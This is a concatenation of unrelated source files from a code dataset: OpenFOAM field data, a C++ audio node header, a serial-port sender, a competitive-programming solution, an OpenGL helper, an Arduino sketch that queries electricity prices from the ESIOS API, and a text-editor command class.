0.00176084
0.0017606
0.00176452
0.0017647
0.00176083
0.00176958
0.00177004
0.00177346
0.00177346
0.0017736
0.00176975
0.00176975
0.00174681
0.00174646
0.00174299
0.00174299
0.00174281
0.00174667
0.00174667
0.00173392
0.00173437
0.00173777
0.00173777
0.00173791
0.00173409
0.00173409
0.00174666
0.00174686
0.00174276
0.00174301
0.00174686
0.00174668
0.001743
0.00175188
0.00175567
0.00175579
0.00175161
0.00175165
0.00175561
0.00175175
0.00175191
0.00175169
0.00175578
0.00175559
0.00175168
0.00175558
0.00175192
0.00174669
0.00174274
0.0017469
0.00174284
0.00174688
0.00174676
0.00174296
0.00174666
0.00174687
0.00174277
0.001743
0.00174687
0.00174668
0.001743
0.00175188
0.00175568
0.0017558
0.00175161
0.00175561
0.00175165
0.00175175
0.00175192
0.0017517
0.00175578
0.00175559
0.00175558
0.00175168
0.00175192
0.00174669
0.00174274
0.0017469
0.00174284
0.00174688
0.00174296
0.00174676
0.0017341
0.00173796
0.00173777
0.00173388
0.00173776
0.00173387
0.00173411
0.0017289
0.00172506
0.00172911
0.00172496
0.00172897
0.00172909
0.00172518
0.00173407
0.00173797
0.00173786
0.0017338
0.00173395
0.00173779
0.00173385
0.00172887
0.00172907
0.00172499
0.00172522
0.00172907
0.00172888
0.00172521
0.0017341
0.00173796
0.00173777
0.00173388
0.00173776
0.00173387
0.0017341
0.0017289
0.00172506
0.00172911
0.00172496
0.00172909
0.00172897
0.00172518
0.00173407
0.00173797
0.00173785
0.0017338
0.00173779
0.00173385
0.00173395
0.00172886
0.00172907
0.00172498
0.00172522
0.00172907
0.00172888
0.00172521
0.00174681
0.00174646
0.00174298
0.00174298
0.00174667
0.00174667
0.00174281
0.00173392
0.00173436
0.00173777
0.00173777
0.00173409
0.00173791
0.00173409
0.00174667
0.00174687
0.00174277
0.00174301
0.00174687
0.00174668
0.001743
0.00175188
0.00175568
0.00175579
0.00175161
0.00175166
0.00175561
0.00175176
0.00175191
0.00175169
0.00175578
0.00175559
0.00175168
0.00175558
0.00175192
0.0017467
0.00174274
0.0017469
0.00174284
0.00174688
0.00174676
0.00174297
0.00174667
0.00174687
0.00174301
0.00174277
0.00174668
0.00174687
0.001743
0.00175188
0.00175568
0.0017558
0.00175161
0.00175561
0.00175166
0.00175176
0.00175192
0.00175169
0.00175559
0.00175578
0.00175558
0.00175192
0.00175168
0.0017467
0.00174274
0.0017469
0.00174284
0.00174688
0.00174297
0.00174676
0.0017341
0.00173796
0.00173777
0.00173388
0.00173776
0.00173387
0.00173411
0.0017289
0.00172506
0.00172911
0.00172496
0.00172897
0.00172909
0.00172518
0.00173407
0.00173798
0.00173786
0.0017338
0.00173395
0.00173779
0.00173385
0.00172887
0.00172908
0.00172498
0.00172523
0.00172907
0.00172888
0.00172522
0.00173411
0.00173777
0.00173796
0.00173388
0.00173776
0.00173411
0.00173387
0.0017289
0.00172507
0.00172911
0.00172497
0.00172909
0.00172897
0.00172519
0.00173407
0.00173798
0.00173786
0.0017338
0.00173779
0.00173385
0.00173395
0.00172887
0.00172908
0.00172523
0.00172499
0.00172888
0.00172908
0.00172522
0.00174666
0.00174686
0.001743
0.00174276
0.00174667
0.00174686
0.00174299
0.00175187
0.00175567
0.00175579
0.0017516
0.00175175
0.0017556
0.00175165
0.00175191
0.00175169
0.00175558
0.00175578
0.00175191
0.00175557
0.00175167
0.00174669
0.00174274
0.00174689
0.00174284
0.00174675
0.00174687
0.00174296
0.0017341
0.00173795
0.00173776
0.00173388
0.00173775
0.00173386
0.0017341
0.0017289
0.00172506
0.0017291
0.00172496
0.00172518
0.00172896
0.00172908
0.00173407
0.00173797
0.00173785
0.0017338
0.00173779
0.00173394
0.00173384
0.00172886
0.00172907
0.00172498
0.00172522
0.00172521
0.00172907
0.00172888
0.0017341
0.00173776
0.00173795
0.00173388
0.00173775
0.0017341
0.00173386
0.0017289
0.00172506
0.00172911
0.00172496
0.00172908
0.00172897
0.00172518
0.00173407
0.00173797
0.00173785
0.0017338
0.00173778
0.00173384
0.00173394
0.00172886
0.00172907
0.00172522
0.00172498
0.00172888
0.00172907
0.00172521
0.00174681
0.00174646
0.00174299
0.00174299
0.00174668
0.00174668
0.00174281
0.00173392
0.00173437
0.00173777
0.00173777
0.00173409
0.00173792
0.00173409
0.00174666
0.00174686
0.001743
0.00174276
0.00174667
0.00174686
0.001743
0.00175188
0.00175567
0.00175579
0.0017516
0.00175175
0.00175561
0.00175165
0.00175191
0.00175169
0.00175558
0.00175578
0.00175191
0.00175557
0.00175168
0.00174669
0.00174274
0.0017469
0.00174284
0.00174676
0.00174687
0.00174296
0.0017341
0.00173777
0.00173795
0.00173388
0.00173775
0.0017341
0.00173387
0.0017289
0.00172506
0.00172911
0.00172496
0.00172518
0.00172897
0.00172909
0.00173407
0.00173797
0.00173785
0.0017338
0.00173779
0.00173395
0.00173385
0.00172887
0.00172907
0.00172522
0.00172498
0.00172522
0.00172888
0.00172907
0.0017341
0.00173777
0.00173796
0.00173388
0.00173776
0.00173411
0.00173387
0.0017289
0.00172506
0.0017291
0.00172496
0.00172908
0.00172896
0.00172518
0.00173407
0.00173797
0.00173785
0.00173379
0.00173779
0.00173384
0.00173394
0.00172887
0.00172907
0.00172522
0.00172498
0.00172888
0.00172907
0.00172521
0.00173391
0.00173436
0.00173776
0.00173776
0.00173791
0.00173408
0.00173408
0.00171129
0.00171092
0.00170747
0.00170747
0.0017073
0.00171114
0.00171114
0.00169845
0.00169889
0.00170228
0.00170228
0.00170243
0.00169862
0.00169862
0.00171113
0.00171132
0.00170725
0.00170748
0.00171133
0.00171114
0.00170748
0.00171631
0.00172009
0.00172021
0.00171605
0.00171609
0.00172002
0.00171619
0.00171635
0.00171612
0.00172019
0.00172
0.00171611
0.00171999
0.00171635
0.00171116
0.00170722
0.00171137
0.00170733
0.00171134
0.00171123
0.00170744
0.00171112
0.00171132
0.00170724
0.00170748
0.00171132
0.00171113
0.00170748
0.00171631
0.00172009
0.0017202
0.00171604
0.00172002
0.00171609
0.00171619
0.00171635
0.00171612
0.00172019
0.00172
0.00171999
0.00171611
0.00171635
0.00171115
0.00170722
0.00171136
0.00170733
0.00171134
0.00170744
0.00171122
0.00169863
0.00170246
0.00170227
0.0016984
0.00170226
0.00169839
0.00169863
0.00169345
0.00168963
0.00169366
0.00168953
0.00169352
0.00169364
0.00168975
0.00169859
0.00170248
0.00170236
0.00169833
0.00169848
0.0017023
0.00169837
0.00169342
0.00169362
0.00168955
0.00168979
0.00169362
0.00169343
0.00168978
0.00169862
0.00170246
0.00170227
0.0016984
0.00170226
0.00169838
0.00169863
0.00169344
0.00168963
0.00169366
0.00168953
0.00169363
0.00169352
0.00168974
0.00169859
0.00170247
0.00170236
0.00169832
0.00170229
0.00169837
0.00169847
0.00169341
0.00169361
0.00168955
0.00168979
0.00169361
0.00169343
0.00168978
0.00171127
0.00171092
0.00170747
0.00170747
0.00171114
0.00171113
0.00170729
0.00169844
0.00169889
0.00170228
0.00170228
0.00169861
0.00170242
0.00169861
0.00171113
0.00171133
0.00170725
0.00170749
0.00171132
0.00171114
0.00170748
0.00171631
0.00172009
0.00172021
0.00171604
0.00171609
0.00172002
0.00171619
0.00171635
0.00171613
0.00172019
0.00172
0.00171611
0.00171999
0.00171635
0.00171115
0.00170723
0.00171137
0.00170733
0.00171134
0.00171123
0.00170745
0.00171113
0.00171133
0.00170749
0.00170725
0.00171114
0.00171133
0.00170748
0.00171632
0.0017201
0.00172022
0.00171605
0.00172003
0.0017161
0.0017162
0.00171635
0.00171613
0.00172
0.0017202
0.00171999
0.00171635
0.00171612
0.00171116
0.00170723
0.00171137
0.00170733
0.00171135
0.00170745
0.00171123
0.00169863
0.00170247
0.00170228
0.00169841
0.00170227
0.0016984
0.00169863
0.00169345
0.00168964
0.00169366
0.00168953
0.00169352
0.00169364
0.00168975
0.0016986
0.00170249
0.00170237
0.00169833
0.00169848
0.0017023
0.00169837
0.00169342
0.00169363
0.00168956
0.00168979
0.00169362
0.00169343
0.00168979
0.00169863
0.00170228
0.00170248
0.00169841
0.00170227
0.00169863
0.0016984
0.00169346
0.00168964
0.00169367
0.00168954
0.00169365
0.00169353
0.00168975
0.0016986
0.00170249
0.00170237
0.00169834
0.0017023
0.00169838
0.00169848
0.00169342
0.00169362
0.00168979
0.00168956
0.00169343
0.00169363
0.00168978
0.00171112
0.00171133
0.00170748
0.00170724
0.00171113
0.00171132
0.00170747
0.00171631
0.00172009
0.0017202
0.00171604
0.00171619
0.00172002
0.00171608
0.00171634
0.00171612
0.00172
0.00172018
0.00171635
0.00171999
0.00171611
0.00171115
0.00170722
0.00171136
0.00170733
0.00171122
0.00171134
0.00170744
0.00169862
0.00170246
0.00170227
0.0016984
0.00170226
0.00169839
0.00169863
0.00169344
0.00168963
0.00169365
0.00168953
0.00168975
0.00169352
0.00169363
0.00169859
0.00170248
0.00170236
0.00169832
0.00170229
0.00169847
0.00169837
0.00169341
0.00169362
0.00168955
0.00168979
0.00168978
0.00169361
0.00169343
0.00169862
0.00170227
0.00170246
0.0016984
0.00170226
0.00169863
0.00169839
0.00169345
0.00168963
0.00169366
0.00168953
0.00169364
0.00169352
0.00168975
0.00169859
0.00170248
0.00170236
0.00169833
0.00170229
0.00169837
0.00169848
0.00169341
0.00169362
0.00168979
0.00168955
0.00169343
0.00169362
0.00168978
0.00171128
0.00171093
0.00170747
0.00170747
0.00171114
0.00171114
0.0017073
0.00169845
0.00169889
0.00170228
0.00170228
0.00169862
0.00170243
0.00169862
0.00171112
0.00171133
0.00170749
0.00170724
0.00171114
0.00171132
0.00170748
0.00171631
0.00172009
0.0017202
0.00171604
0.00171619
0.00172002
0.00171608
0.00171635
0.00171612
0.00172
0.00172018
0.00171635
0.00171999
0.00171611
0.00171115
0.00170722
0.00171136
0.00170733
0.00171122
0.00171133
0.00170744
0.00169863
0.00170227
0.00170247
0.00169841
0.00170227
0.00169863
0.0016984
0.00169345
0.00168964
0.00169367
0.00168953
0.00168975
0.00169353
0.00169364
0.0016986
0.00170248
0.00170237
0.00169833
0.0017023
0.00169848
0.00169838
0.00169342
0.00169362
0.00168979
0.00168956
0.00168979
0.00169343
0.00169362
0.00169863
0.00170227
0.00170246
0.00169841
0.00170226
0.00169863
0.00169839
0.00169345
0.00168964
0.00169366
0.00168953
0.00169364
0.00169352
0.00168975
0.00169859
0.00170248
0.00170236
0.00169833
0.00170229
0.00169837
0.00169848
0.00169341
0.00169362
0.00168979
0.00168955
0.00169343
0.00169362
0.00168978
0.00169844
0.00169889
0.00170228
0.00170228
0.00170242
0.00169861
0.00169861
0.0016759
0.00167555
0.00167211
0.00167212
0.00167194
0.00167577
0.00167577
0.00166312
0.00166357
0.00166695
0.00166695
0.00166709
0.0016633
0.0016633
0.00167575
0.00167596
0.00167189
0.00167213
0.00167596
0.00167576
0.00167212
0.00168092
0.00168468
0.0016848
0.00168065
0.0016807
0.00168461
0.0016808
0.00168095
0.00168073
0.00168478
0.00168459
0.00168072
0.00168458
0.00168095
0.00167578
0.00167187
0.001676
0.00167197
0.00167597
0.00167586
0.00167209
0.00167575
0.00167595
0.00167189
0.00167213
0.00167595
0.00167576
0.00167212
0.00168091
0.00168468
0.00168479
0.00168065
0.00168461
0.00168069
0.0016808
0.00168095
0.00168073
0.00168478
0.00168459
0.00168458
0.00168071
0.00168095
0.00167578
0.00167187
0.00167599
0.00167197
0.00167597
0.00167208
0.00167585
0.00166327
0.00166714
0.00166703
0.00166301
0.00166316
0.00166696
0.00166305
0.00167591
0.00167554
0.00167211
0.00167211
0.00167577
0.00167577
0.00167194
0.00167575
0.00167596
0.00167189
0.00167213
0.00167596
0.00167577
0.00167212
0.00168092
0.00168469
0.0016848
0.00168065
0.0016807
0.00168462
0.0016808
0.00168096
0.00168073
0.00168479
0.00168459
0.00168072
0.00168458
0.00168096
0.00167579
0.00167187
0.00167599
0.00167198
0.00167597
0.00167586
0.00167209
0.00167576
0.00167596
0.00167213
0.00167189
0.00167577
0.00167596
0.00167212
0.00168092
0.00168469
0.0016848
0.00168066
0.00168462
0.0016807
0.00168081
0.00168096
0.00168074
0.00168459
0.00168478
0.00168459
0.00168096
0.00168072
0.00167579
0.00167187
0.001676
0.00167198
0.00167597
0.00167209
0.00167586
0.00166331
0.00166713
0.00166693
0.00166309
0.00166693
0.00166308
0.00166331
0.00166328
0.00166715
0.00166703
0.00166302
0.00166317
0.00166696
0.00166306
0.00166331
0.00166693
0.00166713
0.00166309
0.00166693
0.00166331
0.00166308
0.00166328
0.00166715
0.00166703
0.00166301
0.00166696
0.00166305
0.00166316
0.00167575
0.00167595
0.00167212
0.00167189
0.00167576
0.00167595
0.00167212
0.00168092
0.00168468
0.0016848
0.00168065
0.0016808
0.00168461
0.00168069
0.00168095
0.00168073
0.00168459
0.00168478
0.00168095
0.00168458
0.00168071
0.00167578
0.00167187
0.00167599
0.00167197
0.00167585
0.00167596
0.00167209
0.00167591
0.00167555
0.00167212
0.00167212
0.00167577
0.00167577
0.00167194
0.00166313
0.00166356
0.00166694
0.00166695
0.0016633
0.00166709
0.0016633
0.00167575
0.00167596
0.00167213
0.00167189
0.00167576
0.00167596
0.00167212
0.00168092
0.00168468
0.0016848
0.00168065
0.0016808
0.00168461
0.0016807
0.00168095
0.00168073
0.00168459
0.00168478
0.00168095
0.00168458
0.00168072
0.00167578
0.00167187
0.001676
0.00167198
0.00167585
0.00167597
0.00167209
0.00166715
0.00166704
0.00166301
0.00166696
0.00166316
)
;
boundaryField
{
topPatch
{
type fixedValue;
value uniform 0;
}
wall
{
type zeroGradient;
}
bottomPatch
{
type zeroGradient;
}
}
// ************************************************************************* //
| |
01c06b83f36f6f99adc3165ae69a9eba4420bfcf | 184a1ff89af3db673c096ea684d87d3bced61486 | /source/include/signalflow/node/sequencing/clock-divider.h | da7d94e4867b3841bd482694d6efb7e61e141492 | [
"MIT"
] | permissive | zeos/signalflow | 9d4de067208fbb34018d9526424783f8ca7ce45a | 1c75030862eeaf6dbe341e23d276880f2f0a991f | refs/heads/master | 2023-05-31T22:03:01.766834 | 2021-06-13T22:56:37 | 2021-06-13T22:56:37 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 527 | h | clock-divider.h | #include "signalflow/core/constants.h"
#include "signalflow/node/node.h"
namespace signalflow
{
class ClockDivider : public Node
{
public:
ClockDivider(NodeRef clock = 0, NodeRef factor = 1);
virtual void alloc() override;
virtual void process(Buffer &out, int num_frames) override;
virtual void trigger(std::string name = SIGNALFLOW_DEFAULT_TRIGGER, float value = 1.0) override;
NodeRef clock;
NodeRef factor;
private:
std::vector<int> counter;
};
REGISTER(ClockDivider, "clock-divider")
}
|
80f1667ee7be2b950c25a12f38d82705971e6a1c | 4a0182f33147034ee4ff2b6ed6b1b2563aa046ad | /r/r/pc/cpp/ser/src/main.cpp | ec86369d562d6fd8810842b250f87e8bd7fcebb9 | [] | no_license | thibugio/obor | 0b9227124b317df3068c6ea473ebf9ce93fdece1 | 078c4f477d2cb9cd5a52caae86abb60d85bf6a13 | refs/heads/master | 2020-12-31T00:17:46.228156 | 2015-11-01T20:29:22 | 2015-11-01T20:29:22 | 45,356,114 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,854 | cpp | main.cpp | /* file: srccpp/main.cpp */
#include <cstring>
#include <cstdio>
#include <stdio.h>
#include "common_utils.h"
#include "pc_utils.h"
#include "test_utils.h"
#include "SerialSender.h"
#ifdef WINDOWS
#include <direct.h>
#define get_cwd _getcwd
#else
#include <unistd.h>
#define get_cwd getcwd
#endif
int main(int argc, char * argv[]) {
char basepath[FILENAME_MAX];
assertfail(get_cwd(basepath, FILENAME_MAX), "could not get current working directory.\n");
SerialSender ss;
std::string serialPath = ss.SerialSender::showSerialPath();
printf("SerialSender detected device at %s.\n", serialPath.c_str());
std::vector<std::vector<uint8_t>> packetbytes;
std::vector<int> packetDelays;
std::string path(basepath);
if (argc > 1 && argv[1][0]=='/')
path += std::string(argv[1]);
else
path += "/play/catheter_simple.play";
printf("reading playfile from %s\n", path.c_str());
getPacketBytesFromPlayfile(path.c_str(), packetbytes, packetDelays);
////print results////
int npackets = packetbytes.size();
for (int i=0; i<npackets; i++) {
printf("packet %d (delay=%dms):\n", i, packetDelays[i]);
print_bytes_as_bits(packetbytes[i].size(), packetbytes[i]);
}
assertfail(ss.connect(Baud::BR_9600), "failed to open connection to serial device.");
printf("successfully opened connection to port %s\n", serialPath.c_str());
// send the packets
std::vector<std::vector<uint8_t>> bytesRead;
int nbytes = ss.sendByteVectorsAndRead(packetbytes, bytesRead, packetDelays);
printf("read a total of %d bytes.\n", nbytes);
for (int i=0; i<npackets; i++) {
printf("bytes returned for packet %d: \t", i);
print_bytes_as_bits(bytesRead[i].size(), bytesRead[i]);
}
ss.disconnect();
return 0;
}
|
22e4c97e3afc34a1ef52689cb035010e33cdc7ab | f953e478ae95cabd6e5d813d309dd498f6158898 | /187/a.cpp | 182b17acbed5e944342098542de17b81390920b0 | [] | no_license | geckods/CodeForces | da5b368dd62ba03bd96aadd30f124a388817fd43 | 6a75697a05d460c9593b3549b7ee001e116e3905 | refs/heads/master | 2021-04-19T14:21:22.102504 | 2020-08-14T07:05:48 | 2020-08-14T07:05:48 | 249,611,848 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,706 | cpp | a.cpp | #include <bits/stdc++.h>
using namespace std;
typedef long long ll;
// THINGS TO REMEMBER
// ENDL is slow, '\n' is fast
// Clear everything (including graphs) between test cases
// use anti-anti-hash: https://codeforces.com/blog/entry/62393
// pb-ds: https://codeforces.com/blog/entry/11080
// check when to use LLONG_MAX/LLONG_MIN vs INT_MAX or INT_MIN
// You frequently suffer from confirmation bias - you trust your initial solution and miss simple things.
// When you hit a roadblock, remember to rethink the solution ground up, not just try hacky fixes
int main(){
#ifndef ONLINE_JUDGE
freopen("input", "r", stdin);
freopen("output", "w", stdout);
freopen("error", "w", stderr);
#endif
ios_base::sync_with_stdio(false);
cin.tie(NULL);
ll b,d;
cin>>b>>d;
string a,c;
cin>>a>>c;
ll alen = a.length();
ll clen = c.length();
ll nextChar[alen][26];
for(int i=0;i<alen;i++){
for(int j=0;j<26;j++){
nextChar[i][j]=-1;
}
}
nextChar[alen-1][a[alen-1]-'a']=alen-1;
for(int i=alen-2;i>=0;i--){
for(int j=0;j<26;j++){
nextChar[i][j]=nextChar[i+1][j];
}
nextChar[i][a[i]-'a']=i;
}
for(int i=0;i<alen;i++){
for(int j=0;j<26;j++){
if(nextChar[i][j]==-1){
nextChar[i][j]=nextChar[0][j];
}
}
}
ll ap=0;
ll cp=0;
ll nap;
ll oap;
ll numIterA=0;
ll numIterC=0;
ll firstUse = nextChar[0][c[0]-'a'];
map<intpair,intpair> myMap;
while(1){
nap = nextChar[ap][c[cp]-'a'];
if(cp == 0){
cerr<<ap<<" "<<nap<<" "<<firstUse<<endl;
}
// cerr<<ap<<" "<<nap<<" "<<cp<<endl;
if(nap==-1){
cout<<0<<endl;
return 0;
}
oap = ap;
ap = (nap+1)%alen;
if(ap<=oap)numIterA++;
cp++;
if(cp==clen){
cp=0;
numIterC++;
}
if(cp == 0 && nextChar[ap][c[0]-'a']==firstUse){
if(ap >= nextChar[ap][c[0]-'a'])
numIterA++;
break;
}
}
// cout<<numIterA<<" "<<numIterC<<endl;
ll ans = ((b/numIterA)*numIterC)/d;
b%=numIterA;
if(b==0){
cout<<ans<<endl;
return 0;
}
ap = nap = oap = cp = 0;
numIterC = numIterA = 0;
while(1){
nap = nextChar[ap][c[cp]-'a'];
// cerr<<ap<<" "<<nap<<" "<<cp<<endl;
// cerr<<numIterA<<" "<<b<<endl;
if(nap==-1){
cout<<0<<endl;
return 0;
}
oap = ap;
ap = (nap+1)%alen;
if(ap<=oap)numIterA++;
if(numIterA==b){
ans+=numIterC/d;
break;
}
cp++;
if(cp==clen){
cp=0;
numIterC++;
}
}
// cout<<numIterA<<" "<<numIterC<<endl;
cout<<ans<<endl;
}
|
3d0bea70e9b5ae5700aec46f62888dc31bc20c5a | 5321a22ec4690d3a127f96b9c77fa348dc487b15 | /src/Info/ViewRangeInfo.cpp | c95d2de01bb6b3a51d4151249d62010ec1e237ee | [] | no_license | YuPrinter/visualizer | f3ceebf639c3593ae6dd62dc0efab5b3f33c9391 | 6c415f1aca628f9deee8164e08f9bda8fb8a7ba1 | refs/heads/master | 2021-05-28T06:23:50.567233 | 2014-12-27T08:35:20 | 2014-12-27T08:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,298 | cpp | ViewRangeInfo.cpp | #include "Info/ViewRangeInfo.h"
namespace ViewRangeInfo {
ViewRange::ViewRange(const ViewAxisRange & xRange,
const ViewAxisRange & yRange,
const ViewAxisRange & zRange,
QOpenGLShaderProgram * program,
const ShaderInfo::ShaderVariablesNames & shaderVariables) :
xRange(xRange), yRange(yRange), zRange(zRange),
shaderXRange(program->uniformLocation(shaderVariables.at(0))),
shaderYRange(program->uniformLocation(shaderVariables.at(1))),
shaderZRange(program->uniformLocation(shaderVariables.at(2))) {
}
void ViewRange::setUniformValue(QOpenGLShaderProgram * program) {
program->setUniformValue(shaderXRange, xRange);
program->setUniformValue(shaderYRange, yRange);
program->setUniformValue(shaderZRange, zRange);
}
void ViewRange::setViewAxisRange(const ViewAxisRange & viewAxisRange,
const ViewAxis viewAxis) {
switch (viewAxis) {
case XAXIS:
xRange = viewAxisRange;
break;
case YAXIS:
yRange = viewAxisRange;
break;
case ZAXIS:
zRange = viewAxisRange;
break;
}
}
}
|
03c613dde95a3bf3f83979926cf9210e47465ec3 | 1b39eeb2d1f67235babe241c2d7c064432d93ad3 | /LeerPrecioLuz_ESIOS_API.ino | 720d0262384b20f6766d2e3442ec9dccb140f898 | [] | no_license | rgrastur/ArduinoEsios | ffb2dd69c6da8421c46cd87eb3d636efef1d469b | 7a70136eaa76e514b9dfaa65784e38ca15d5ea4c | refs/heads/master | 2020-06-03T15:46:08.334330 | 2019-07-03T21:49:04 | 2019-07-03T21:49:04 | 191,635,647 | 2 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 7,112 | ino | LeerPrecioLuz_ESIOS_API.ino | #include <Wire.h>
#include <LiquidCrystal_I2C.h>
#include <RTClib.h>
// Placa WeMos D1
// Tiny RTC DS1307 I2C
// LCD Crystal PCF8574A
// Consulta GET ejemplo: indicators/1013?start_date=09-06-2019T00%3A00&end_date=09-06-2019T23%3A00
#include <ArduinoJson.h>
#include <ESP8266WiFi.h>
#include <ESP8266HTTPClient.h>
#include "config.h" // donde estan los datos sensibles
// WiFi Parameters
const char* ssid = SSID_NAME;
const char* password = WIFI_PASSWORD;
HTTPClient httpClient; //Object of class HTTPClient
//API
const String SERVER_ESIOS = SERVER_API;
const String TOKEN = TOKEN_API;
const char* FINGERPRINT=FINGERPRINT_API;
const String TYPE = TYPE_DEFAULT;
const String PEAJE = PEAJE_DEFAULT;
//LCD
const int NUM_CHAR = 20;
const int NUM_LINES = 4;
LiquidCrystal_I2C lcd(0x3F, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE); // Set the LCD I2C address
//TINY RTC
RTC_DS3231 rtc; //los puertos son los mismos que la version anterior, solo cambia la precisión del hardware.
String strToday,strTime;
int analogBAT = A0; //leer estado de la bateria ADC
//Comprobacion ERRORES
boolean hasError;
String msgError;
//OTROS FLAGS
boolean _DEBUGGER;
unsigned int statusProgram;
unsigned long previousMillis; // millis() returns an unsigned long.
void setup() {
initValues();
Serial.begin(115200);
Wire.begin(); // Inicia el puerto I2C
rtc.begin();
DateTime today = rtc.now();
if (!rtc.begin()) {
if(_DEBUGGER == true) {Serial.println(F("No encuentro RTC"));}
hasError = true;
msgError="No encuentro RTC";
yield();
while (1);
}
if (rtc.lostPower()) {
initDate();
msgError="Perdida potencia...";
if(_DEBUGGER == true) {
Serial.println("Perdida potencia...");
Serial.println("Se ha adjustado la fecha");
}
delay(1000);
}
if( String(today.year(),DEC) != "2019"){
initDate();
msgError="Valor de fabrica..."+String(today.year(),DEC) ;
if(_DEBUGGER == true) {
Serial.println("Tiene un valor de fabrica y se ha adjustado");
}
delay(1000);
}
pinMode(analogBAT, OUTPUT);
lcd.begin(NUM_CHAR,NUM_LINES); // initialize the lcd for 20 chars 4 lines and turn on backlight
lcd.backlight(); // backlight on
WiFi.begin(ssid, password);
while (WiFi.status() != WL_CONNECTED) {
yield();
Serial.println("Connecting...");
delay(5000);
}
}
void loop() {
Serial.println("Error: "+ msgError);
delay(5000);
/***
* Comprobamos el valor de BAT del RTC
*/
unsigned long currentMillis = millis(); // grab current time
if ((unsigned long)(currentMillis - previousMillis) >= CHECK_BAT) {
previousMillis = millis();
int valBAT = analogRead(analogBAT); // read the input pin
Serial.println("BAT: " + valBAT);
}
/***
* En cada vuelta asignamos el DateTime
*/
DateTime today = rtc.now(); // Obtiene la fecha y hora del RTC
strToday = String(today.day(),DEC) + "-"+String(today.month(),DEC) + "-"+String(today.year(),DEC);
strTime = String(today.hour(),DEC) + ":"+String(today.minute(),DEC) + ":"+String(today.second(),DEC);
delay(1000);
Serial.println("ESTADO OUTSIDE: "+statusProgram);
delay(1000);
if ( WiFi.status() == WL_CONNECTED && statusProgram == 0) {
statusProgram == 1;
delay(1000);
Serial.println("ESTADO INSIDE: "+statusProgram);
delay(1000);
//TODO: Activar un led para saber el estado del wifi.
///////////
String url = getURLIndicatorWithDateTime(strToday);
if(_DEBUGGER == true) {Serial.println(url);}
httpClient.begin(url,FINGERPRINT);
httpClient.addHeader("Host", "api.esios.ree.es");
httpClient.addHeader("Authorization", "Token token="+TOKEN);
httpClient.addHeader("Accept", "application/json; application/vnd.esios-api-v1+json");
httpClient.addHeader("Content-Type", "application/json");
//httpClient.addHeader("Cookie", "");
int httpCodeResponse = httpClient.GET();
if(_DEBUGGER == true) {Serial.println("HTTPCODE: " + httpCodeResponse); }
if(!httpCodeResponse>0){
hasError = true;
msgError = httpClient.errorToString(httpCodeResponse);
if(_DEBUGGER == true){Serial.println("Error code response: "+ msgError);}
}
//Check the returning code
if (httpCodeResponse >0) {
// Get the request response payload
String payload = httpClient.getString();
//if(_DEBUGGER == true){Serial.println("PAYLOAD: "+ payload);}
printPayLoadValues(payload);
}
httpClient.end(); //Close connection
if(_DEBUGGER == true){Serial.println("fin conexión");}
}
else {
Serial.printf("[HTTP} Unable to connect\n");
}
}
void initValues(){
strToday,strTime= "";
analogBAT = A0; //leer estado de la bateria ADC
//Comprobacion ERRORES
hasError = false;
msgError="No Error";
//OTROS FLAGS
_DEBUGGER = true;
statusProgram= 0;
previousMillis=0; // millis() returns an unsigned long.
}
void printPayLoadValues(String payload){
Serial.println("printPayLoadValues");
// Inside the brackets is the capacity of the memory pool in bytes.
// Don't forget to change this value to match your JSON document.
// Use arduinojson.org/v6/assistant to compute the capacity.
DynamicJsonDocument doc(13000) ;
// Deserialize the JSON document
yield();
DeserializationError error = deserializeJson(doc, payload);
// Test if parsing succeeds.
if (error) {
hasError=true;
msgError=error.c_str();
if(_DEBUGGER == true) {
Serial.print("deserializeJson() failed: ");
}
return;
}
const char* des = doc["indicator"]["short_name"];
Serial.println(des);
JsonArray values = doc["indicator"]["values"];
for (JsonObject val : values) {
Serial.print(" Fecha ");
Serial.print(val["datetime"].as<char *>());
Serial.print(", valor: ");
Serial.print(val["value"].as<long>());
Serial.println(" ");
}
}
String getURLIndicatorWithDateTime(String hoy){
//indicators/1013?start_date=09-06-2019T00%3A00&end_date=09-06-2019T23%3A00
String url = SERVER_ESIOS + TYPE + '/' + PEAJE + "?start_date=" + hoy + "T00%3A00";
return url;
}
void initDate(){
rtc.adjust(DateTime(F(__DATE__), F(__TIME__)));// Establece la fecha y hora
}
void printDate(DateTime date)
{
Serial.print(date.day(), DEC);
Serial.print('/');
Serial.print(date.month(), DEC);
Serial.print('/');
Serial.print(date.year(), DEC);
Serial.print("-----");
Serial.print(date.hour(), DEC);
Serial.print(':');
Serial.print(date.minute(), DEC);
Serial.print(':');
Serial.print(date.second(), DEC);
Serial.println();
}
|
edce8b9f8e375d4e6fdb634bd87dbccdf6427e56 | a2a0142267513151581c1f3b867bb7be009e8d0d | /library/commands/FileInfo.cpp | e08a99426dad0a986a8fb1edcdf95fc49aec2529 | [] | no_license | chasehaddleton/vm | a00f868349bb33b9a028127bf30e87cf15ed27a5 | 092f1ef8f07d838c6e9dedd1807e402fe35cfb6e | refs/heads/master | 2021-03-27T09:17:24.517180 | 2017-12-05T02:48:02 | 2017-12-05T02:48:02 | 110,714,675 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 730 | cpp | FileInfo.cpp | //
// Created by Chase Haddleton on 2017-12-03.
//
#include "FileInfo.h"
#include "../input/VMKeyMap.h"
void FileInfo::doExecute(const std::string &command, VMModel &model, int count) const {
auto &sB = state.getStatusBar();
auto &cur = model.getCursor();
std::string msg = "\"" + state.getOpenFileName() + "\" ";
msg += "line " + std::to_string(cur.getYPos() + 1) + " of " + std::to_string(model.size());
msg += (state.isFileModified()) ? " EDITED" : " NOT EDITED";
sB.setMessage(msg);
}
MatchType FileInfo::doMatch(const std::string &s) const {
if (s == "^G") {
return MatchType::FULL;
} else {
return MatchType::NONE;
}
}
FileInfo::FileInfo(VMState &state, const std::string &name) : Command(state, name) {}
|
823ed2a8cab85abcfeeff1cab86cc371663f73ea | 663f36cfff3bfaf9ad64bba430e648b0dadc0f99 | /platform/gucefCORE/include/CTObservingNotifierExpansion.h | b2f0982ff90b3f3a0c3db26535a28153b056a4cb | [
"Apache-2.0"
